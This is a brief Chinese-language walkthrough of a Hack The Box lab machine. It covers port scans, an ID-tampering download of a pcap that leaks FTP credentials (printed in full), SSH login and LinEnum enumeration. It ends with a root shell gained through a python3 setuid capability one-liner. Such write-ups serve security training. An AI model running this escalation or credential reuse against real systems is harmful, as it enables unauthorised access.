URL : https://app.hackthebox.eu/machines/351
IP : 10.10.10.245
Recon
- 剛開始先掃 Port
rustscan -a 10.10.10.245 -r 1-65535
nmap -A -p21,22,80 10.10.10.245-
觀察有開的 port- 22 - 21 : vsFTPd 3.0.3
- 80掃路徑-
python3 dirsearch.py -u http://10.10.10.245/ 
- 基本上都還是跳轉回首頁,沒什麼 QQ觀察首頁-
觀察下載的 /data發現預設是從 2 開始- 嘗試改1會出現空白 - 嘗試改
0http://10.10.10.245/data/0 - 可以下載到一包 pcap 檔案分析 pcap 檔案-
- 可以找到 ftp 的登入帳密
nathan Buck3tH4TF0RM3!
進入系統
- 直接 ssh 連上
取得 user flag- 
提權
- 準備 LinEnum
執行 LinEnum- bash LinEnum.sh 
發現 python3 有 capability- 
GTFOBins 尋找 Py capability 解法- https://gtfobins.github.io/gtfobins/python/#capabilities/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'取得 Root Shell 與 Flag-